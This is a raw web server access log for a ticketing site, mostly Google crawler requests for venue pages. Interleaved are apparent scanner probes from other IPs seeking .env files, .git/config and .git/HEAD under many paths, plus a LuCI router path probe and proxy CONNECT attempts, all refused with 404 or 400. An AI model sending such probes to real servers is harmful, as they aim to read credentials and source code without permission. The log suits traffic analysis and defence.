64.62.197.214 - - [18/Feb/2025:09:23:08 +0100] "GET /geoserver/web/ HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:09:25:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=01A4931A-C165-4B79-C9B2-6B15C1A8EA59 HTTP/1.1" 200 95592
193.68.89.10 - - [18/Feb/2025:09:25:28 +0100] "GET / HTTP/1.1" 404 -
193.68.89.51 - - [18/Feb/2025:09:25:28 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:09:26:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=7955C1DA-0203-9687-2994-14739AEE539F HTTP/1.1" 200 93013
45.144.212.139 - - [18/Feb/2025:09:27:17 +0100] "GET /ticket2/opencms/.git/refs/tags/ HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:09:27:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=180EAAAB-918A-9F1E-ED78-EB81C803FB9F HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:09:27:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=666C887D-F998-338F-2ABE-16022B884D9D HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:28:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=E317C19B-53AA-3539-EAD3-8DD7161AE012 HTTP/1.1" 200 93922
66.249.66.160 - - [18/Feb/2025:09:28:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=A95940B8-9D24-555E-8502-7702CF57B799 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:28:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=DBAF1CDD-BB02-B386-3F1A-E606C2F733BC HTTP/1.1" 200 94785
66.249.66.160 - - [18/Feb/2025:09:30:23 +0100] "GET /ticket2/opencms/en/venue/?countryid=3F84C922-E52E-4F0E-1F8F-97D62941C628 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:32:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=EBEF9B75-B33B-BBAE-FE14-1F037092B34B HTTP/1.1" 200 102918
66.249.66.161 - - [18/Feb/2025:09:39:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=7B8EA247-B72D-57A1-F5B5-112514CAAC1F HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:40:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=90EF2598-A82F-6143-0333-A0B49749F64C HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:09:41:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=6D97DD41-58F8-E86C-8D49-519899AAF206 HTTP/1.1" 200 93013
196.251.70.31 - - [18/Feb/2025:09:41:39 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:09:48:23 +0100] "GET /ticket2/opencms/en/venue/?countryid=6941D863-6987-AFB6-0EB8-DD9A02005855 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:54:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=13702050-2F05-4DBF-E863-0547221CB311 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:09:55:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=86D8F5F1-1C66-F61F-D1EA-1BF1C36E41D6 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:55:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=8AB3059A-CDC7-3AC2-BF58-176BA47DA764 HTTP/1.1" 200 108442
66.249.66.160 - - [18/Feb/2025:09:55:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=D1CF94F0-7D29-9934-B390-888966FEE978 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:56:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=6E625517-1E9A-024B-7EBB-F569FEDEE88E HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:09:58:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=52F4A5D1-57D1-3DCD-E1E5-1C5778B3C28E HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:10:01:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=91AAC8CB-DC00-AD46-25B5-9E567AEBD805 HTTP/1.1" 200 93483
66.249.66.160 - - [18/Feb/2025:10:06:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=D2CF2CB4-9396-305E-92AF-B785C8723E40 HTTP/1.1" 200 93013
114.119.141.178 - - [18/Feb/2025:10:08:41 +0100] "GET /ticket2/opencms/en/venue/?venueid=4455CA08-4C9A-150A-70CE-D4B8FC02B91F HTTP/1.1" 200 63669
13.64.195.51 - - [18/Feb/2025:10:09:58 +0100] "GET /ticket2/opencms/ReportServer HTTP/1.1" 404 -
172.169.6.153 - - [18/Feb/2025:10:10:56 +0100] "GET /ticket2/opencms/login HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:10:11:27 +0100] "GET /ticket2/opencms/en/faq/ HTTP/1.1" 200 66347
66.249.66.160 - - [18/Feb/2025:10:11:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=13E2F7E1-5D94-F02B-9C0C-560B8034AC6C HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:10:12:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=F73B31CF-DEFB-FC53-7E40-B21973CC0497 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:10:13:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=4007957B-6F0C-502F-B270-CD7A61AC3C71 HTTP/1.1" 200 93013
192.64.112.87 - - [18/Feb/2025:10:14:01 +0100] "GET /ticket2/opencms/ HTTP/1.0" 302 -
66.249.66.160 - - [18/Feb/2025:10:15:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=C4D16A7F-3F94-CF6E-7376-231BD32DC9BF HTTP/1.1" 200 93013
146.190.65.69 - - [18/Feb/2025:10:19:02 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:10:21:09 +0100] "GET /ticket2/opencms/en/venue/?venueid=1130FEEB-47FB-DB3F-868A-1D5AA9060598 HTTP/1.1" 200 63627
66.249.66.160 - - [18/Feb/2025:10:21:18 +0100] "GET /ticket2/opencms/en/venue/?venueid=FAA326B5-8F35-0D52-6643-3316F08C9C34 HTTP/1.1" 200 63619
66.249.66.160 - - [18/Feb/2025:10:21:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=D27631CC-9A79-6271-DD99-90FDCD0CA570 HTTP/1.1" 200 63618
66.249.66.162 - - [18/Feb/2025:10:28:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=36C09A59-C496-27BE-0FFA-E2D18F46452F HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:10:33:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=B2685E9F-F5FB-C584-F982-0FC8E094C1AC HTTP/1.1" 200 93013
193.68.89.51 - - [18/Feb/2025:10:34:09 +0100] "GET / HTTP/1.1" 404 -
141.255.166.90 - - [18/Feb/2025:10:35:27 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:10:38:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=3074CB3F-D378-D1B1-5E17-3ED6547AC5E1 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:10:38:27 +0100] "GET /ticket2/opencms/en/venue/?venueid=6EE9D0D2-BB74-C6F6-8AEF-6C13077000FE HTTP/1.1" 200 63613
59.126.63.48 - - [18/Feb/2025:10:40:36 +0100] "GET / HTTP/1.0" 404 -
66.249.66.161 - - [18/Feb/2025:10:46:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=87A625FD-F8B4-E412-121A-2F51AA59B0DD HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:10:47:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=925A6494-6F30-A898-105B-2B0AB62464E2 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:10:47:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=BF81F57B-2AD9-D1E3-4885-A9DA4B970272 HTTP/1.1" 200 63666
66.249.66.161 - - [18/Feb/2025:10:48:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=23D31018-1DE6-5792-AB05-50B75604BF40 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:10:49:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=2F10777F-9907-2201-7AD1-ACB3606C47A4 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:10:49:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=8858D171-8914-8DFD-A2E4-50FE56A44627 HTTP/1.1" 200 93013
196.251.72.73 - - [18/Feb/2025:10:50:34 +0100] "GET /ticket2/opencms/.git/HEAD HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:10:52:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=668D17D3-DDBF-7460-C2FB-E48A99F3BD87 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:10:53:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=4B450FD2-0462-34B9-7186-638797EC0F09 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:00:43 +0100] "GET /ticket2/opencms/en/venue/?countryid=EFE62657-ED88-7045-031D-E16EFB5F4910 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:01:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=9DB285C0-D137-5036-05BF-ABB4B196F392 HTTP/1.1" 200 93690
66.249.66.161 - - [18/Feb/2025:11:01:41 +0100] "GET /ticket2/opencms/en/venue/?countryid=FFFF1061-F0B1-C4E6-4E92-B35C1210D71D HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:02:31 +0100] "GET /ticket2/opencms/en/venue/?venueid=52D842B3-7FB7-16D9-C928-E0FBBB2FAC8C HTTP/1.1" 200 63603
66.249.66.160 - - [18/Feb/2025:11:02:37 +0100] "GET /ticket2/opencms/en/venue/?venueid=D60D6CCF-C522-9251-DD37-F7D629607D55 HTTP/1.1" 200 63637
66.249.66.160 - - [18/Feb/2025:11:02:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=65D2945E-1431-C523-469E-55D7D9B9867C HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:03:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=EC060DB8-FED8-7431-5B9F-CF7C54F51223 HTTP/1.1" 200 100532
66.249.66.161 - - [18/Feb/2025:11:03:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=B54C3B27-273E-C131-E997-905F5C2CDDC3 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:03:33 +0100] "GET /ticket2/opencms/en/venue/?venueid=A349DBED-07A6-8985-882B-FBE6633B82A6 HTTP/1.1" 200 63613
66.249.66.160 - - [18/Feb/2025:11:04:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=6A314B5B-08FE-5CDE-C85D-253064810CDA HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:04:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=3F9833FD-26F3-F144-E677-9F4203CED4E3 HTTP/1.1" 200 93013
45.148.10.90 - - [18/Feb/2025:11:04:52 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
45.148.10.90 - - [18/Feb/2025:11:04:52 +0100] "GET /ticket2/opencms/backup/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:53 +0100] "GET /ticket2/opencms/dev/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:53 +0100] "GET /ticket2/opencms/user/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:54 +0100] "GET /ticket2/opencms/user_panel/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:54 +0100] "GET /ticket2/opencms/ci/cd/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:54 +0100] "GET /ticket2/opencms/.env.stage HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:55 +0100] "GET /ticket2/opencms/.env.uat HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:55 +0100] "GET /ticket2/opencms/build_tool/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:56 +0100] "GET /ticket2/opencms/src/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:56 +0100] "GET /ticket2/opencms/.env.ci HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:56 +0100] "GET /ticket2/opencms/.env.prod.local HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:57 +0100] "GET /ticket2/opencms/api/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:58 +0100] "GET /ticket2/opencms/test_environment/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:58 +0100] "GET /ticket2/opencms/env/.env HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:58 +0100] "GET /ticket2/opencms/.env.testing.local HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:59 +0100] "GET /ticket2/opencms/cms/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:04:59 +0100] "GET /ticket2/opencms/settings/.env HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:05:00 +0100] "GET /ticket2/opencms/app/resources/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:05:00 +0100] "GET /ticket2/opencms/modules/.git/config HTTP/1.1" 404 -
45.148.10.90 - - [18/Feb/2025:11:05:00 +0100] "GET /ticket2/opencms/v3/.git/config HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:11:05:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=281637B5-EBD8-5B84-5601-31AFF5C65765 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:06:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=8FA673E2-F13B-75C4-56CD-A4B786B7BC94 HTTP/1.1" 200 93013
90.151.171.106 - - [18/Feb/2025:11:07:08 +0100] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
66.249.66.160 - - [18/Feb/2025:11:07:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=20EFB686-B272-8573-F37B-891928190471 HTTP/1.1" 200 93013
90.151.171.106 - - [18/Feb/2025:11:07:18 +0100] "GET /?Z76113273351Q1 HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:11:07:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=EFCDD4BE-2B2E-DD3B-EFFB-83BD42354573 HTTP/1.1" 200 103082
66.249.66.161 - - [18/Feb/2025:11:07:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=7D25928D-FFE7-0BD0-CD2F-98EEEB4D8A53 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:08:17 +0100] "GET /ticket2/opencms/en/venue/?venueid=B8C41EE7-7AF6-8871-AC03-F6E6E3E6DF47 HTTP/1.1" 200 63646
66.249.66.161 - - [18/Feb/2025:11:08:37 +0100] "GET /ticket2/opencms/en/venue/?venueid=A4544F22-1405-47A7-F95C-5F7B102A464E HTTP/1.1" 200 63669
193.68.89.10 - - [18/Feb/2025:11:11:20 +0100] "GET / HTTP/1.1" 404 -
193.68.89.51 - - [18/Feb/2025:11:11:44 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:11:12:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=D3DB55BA-ABAE-0702-A973-202744AB3BB9 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:12:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=E7631FE5-7061-8322-868B-F6085CDA8809 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:12:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=B756B65C-E014-24B5-95EC-187A417913E3 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:12:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=99B1C0F6-84FB-98CC-65FC-5142D0D877AC HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:13:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=E6D1D9A5-7003-75BD-6D2C-CB60A7D92969 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:13:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=DDBEC1A9-923C-6F8A-904B-EA3F8C6D99F4 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:13:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=6F3B2F32-4F0D-5515-B82B-E3D86CD1E73F HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:13:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=FECEDBB4-CBB7-37BC-56A2-3BCE3EF7E1E8 HTTP/1.1" 200 95572
66.249.66.160 - - [18/Feb/2025:11:15:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=01966824-53B3-F640-5B46-BD1F79FADDA9 HTTP/1.1" 200 93013
141.255.166.90 - - [18/Feb/2025:11:17:55 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:11:18:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=19657A1A-D641-70BC-9F36-F54EFCC4AC04 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:18:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=A6670E01-CE49-A608-C597-250C3D48D088 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:18:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=44E342A3-ABB4-8C4C-D9AB-B83FB043D424 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:18:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=F444CA42-FE5C-C76F-1CFD-E45E1073B063 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:20:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=B8EC120B-4F43-C769-CF6D-BEF2F141BF54 HTTP/1.1" 200 93013
45.156.128.64 - - [18/Feb/2025:11:21:06 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
45.156.128.64 - - [18/Feb/2025:11:21:07 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.162 - - [18/Feb/2025:11:22:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=9554F04E-60EE-4D4B-3CE3-7EC55ADC4B4E HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:22:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=01A4931A-C165-4B79-C9B2-6B15C1A8EA57 HTTP/1.1" 200 121474
66.249.66.161 - - [18/Feb/2025:11:23:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=BCA33F4B-7509-BC45-DAD2-4CA6BF14FC82 HTTP/1.1" 200 94141
66.249.66.161 - - [18/Feb/2025:11:24:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=D12DC4A4-98E1-D0B7-783E-AE51CC52E5AE HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:26:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=5EEFCF47-AD38-F951-EE2B-C85C4E24342F HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:28:49 +0100] "GET /ticket2/opencms/en/venue/?countryid=AE789D77-DA16-B130-0CBE-FA563F4A0E8A HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:31:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=4F919533-4A01-8CFD-B333-C95FA433589C HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:31:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=E687CC57-02FA-AF76-268E-C1A53D569993 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:31:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=D89C1642-F4D3-8098-A250-FAF55037EC33 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:31:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=7181F1B1-BB62-9D43-5EFA-B07E8505C9FD HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:33:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=E7736334-EC5F-4E42-8871-FF5303C85500 HTTP/1.1" 200 93713
66.249.66.160 - - [18/Feb/2025:11:33:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=1D29B349-241A-DA25-C29E-C6C960274511 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:35:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=39338EA9-6CB0-428E-D26D-7F5D8BBADF63 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:35:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=203E9A91-CAB8-9987-28BB-AF31071CCCA1 HTTP/1.1" 200 94408
66.249.66.161 - - [18/Feb/2025:11:35:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=87A0CCAA-3D1F-51AB-962B-6BBE856D2C40 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:35:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=A07C6930-60EB-29AC-3FDB-C97CE816C6C1 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:35:38 +0100] "GET /ticket2/opencms/en/standard/ HTTP/1.1" 200 76856
66.249.66.160 - - [18/Feb/2025:11:35:44 +0100] "GET /ticket2/opencms/en/venue/?countryid=22C9ACC4-BEB7-DB26-7DA3-281C548BB009 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:37:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=9ACB31BA-4730-8A49-6A26-C927F023CAB9 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:37:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=00A745F5-9727-5A5E-55DB-C7A480FFD3CE HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:39:43 +0100] "GET /ticket2/opencms/en/venue/?venueid=CB444C4A-4CCE-4670-714E-21D950F578CB HTTP/1.1" 200 63646
66.249.66.160 - - [18/Feb/2025:11:40:09 +0100] "GET /ticket2/opencms/en/venue/?venueid=255EC0A2-CFF1-A438-835D-B03A710178CE HTTP/1.1" 200 63600
66.249.66.160 - - [18/Feb/2025:11:40:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=E0555A68-26A1-67E7-1128-6849A8576005 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:41:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=ACB5B4FC-B2E3-1024-DD30-02CD725AE8FE HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:41:41 +0100] "GET /ticket2/opencms/en/venue/?venueid=DD1C51CF-8829-9FCD-25F4-AC82F4E66D67 HTTP/1.1" 200 63613
66.249.66.162 - - [18/Feb/2025:11:42:31 +0100] "GET /ticket2/opencms/en/venue/?venueid=EAA79C0D-ABC0-4CB3-40C0-8144A46B3F3A HTTP/1.1" 200 63696
66.249.66.161 - - [18/Feb/2025:11:42:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=C6684262-14F2-16A6-6E24-1E1928C60800 HTTP/1.1" 200 63645
66.249.66.162 - - [18/Feb/2025:11:44:46 +0100] "GET /ticket2/opencms/en/venue/?countryid=40FD0827-8E8D-58A2-3FF2-3253A033E8A7 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:47:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=ACBCEDDC-478F-6F5C-046F-A1A55C83F98D HTTP/1.1" 200 99186
66.249.66.162 - - [18/Feb/2025:11:47:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=56FE8DB8-0A46-00E3-175D-347FD72BDA70 HTTP/1.1" 200 93703
66.249.66.160 - - [18/Feb/2025:11:47:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=99B8CCCF-76CE-5509-EB6E-95AE6D1E4C98 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:48:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=8E9B7573-DABA-9F65-28F4-901E70BA5D59 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:48:30 +0100] "GET /ticket2/opencms/en/venue/?countryid=F4546A23-438C-B8AA-E6C1-C86A24730617 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:48:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=87042EBC-41CD-88B3-A5A5-7C6AF4E19F07 HTTP/1.1" 200 93013
47.91.91.123 - - [18/Feb/2025:11:49:24 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.161 - - [18/Feb/2025:11:49:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=98E21F26-BA61-B037-B7B7-D6DBAF5824E4 HTTP/1.1" 200 104677
66.249.66.161 - - [18/Feb/2025:11:49:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=46D1BD56-50EF-279E-34BE-11A1EF985421 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:49:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=BA1BF93B-47B3-318B-02DF-4D6F84D30854 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:11:50:35 +0100] "GET /ticket2/opencms/en/venue/?countryid=893226B0-D69E-4766-831E-1D42E613AB75 HTTP/1.1" 200 93255
66.249.66.160 - - [18/Feb/2025:11:51:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=6994D0E6-4880-D162-87F9-DDDE5D63EE86 HTTP/1.1" 200 104896
66.249.66.160 - - [18/Feb/2025:11:51:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=B33351B8-DB63-1834-566A-CB44E5291395 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:51:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=C5607D99-17A0-74C0-7750-F78B8898600C HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:56:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=44A94E16-590A-CB98-37E9-7B0A55C9B453 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:11:56:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=ADE48E06-C02A-081C-C0CF-A96D2EE2FC7A HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:11:57:09 +0100] "GET /ticket2/opencms/en/venue/?venueid=9285D1CB-1730-2C66-6A41-4ED501D8B1BF HTTP/1.1" 200 63642
196.251.115.95 - - [18/Feb/2025:11:57:10 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 -
66.249.66.160 - - [18/Feb/2025:11:57:20 +0100] "GET /ticket2/opencms/en/venue/?venueid=EBEEFBDF-BE46-CDA7-09F6-23C46162BE1D HTTP/1.1" 200 63627
66.249.66.160 - - [18/Feb/2025:11:57:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=56D23316-45BB-EAED-210C-AAB7AC1B2B81 HTTP/1.1" 200 63609
66.249.66.161 - - [18/Feb/2025:11:58:23 +0100] "GET /ticket2/opencms/en/venue/?countryid=6DB0834B-E25F-449A-5515-025982E4CF10 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:12:01:26 +0100] "GET /ticket2/opencms/en/venue/?venueid=8CFC3D89-30A6-4F45-212C-6A9F575010B5 HTTP/1.1" 200 63636
66.249.66.160 - - [18/Feb/2025:12:01:31 +0100] "GET /ticket2/opencms/en/venue/?venueid=C5F64BBB-8A8A-B218-4636-88A4C2E914C4 HTTP/1.1" 200 63663
66.249.66.161 - - [18/Feb/2025:12:03:40 +0100] "GET /ticket2/opencms/en/venue/?venueid=19325984-0026-6C0D-6440-F86BAED52A7D HTTP/1.1" 200 63592
66.249.66.162 - - [18/Feb/2025:12:05:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=8C7CF186-03F6-C097-A350-C9F7394E9D8F HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:12:05:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=733736B0-BB51-71CE-21FF-5220C9ACD245 HTTP/1.1" 200 93704
66.249.66.160 - - [18/Feb/2025:12:05:21 +0100] "GET /ticket2/opencms/en/venue/?column= HTTP/1.1" 500 -
66.249.66.160 - - [18/Feb/2025:12:05:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=D9C90621-DB02-1B5C-863E-8CD5BDDB79A3 HTTP/1.1" 200 93472
66.249.66.160 - - [18/Feb/2025:12:05:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=63BA787B-924D-97B6-EDC4-126C78A77B7D HTTP/1.1" 200 95888
66.249.66.160 - - [18/Feb/2025:12:06:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=41062D18-DA6E-3D10-CF2B-6CACED69017C HTTP/1.1" 200 93013
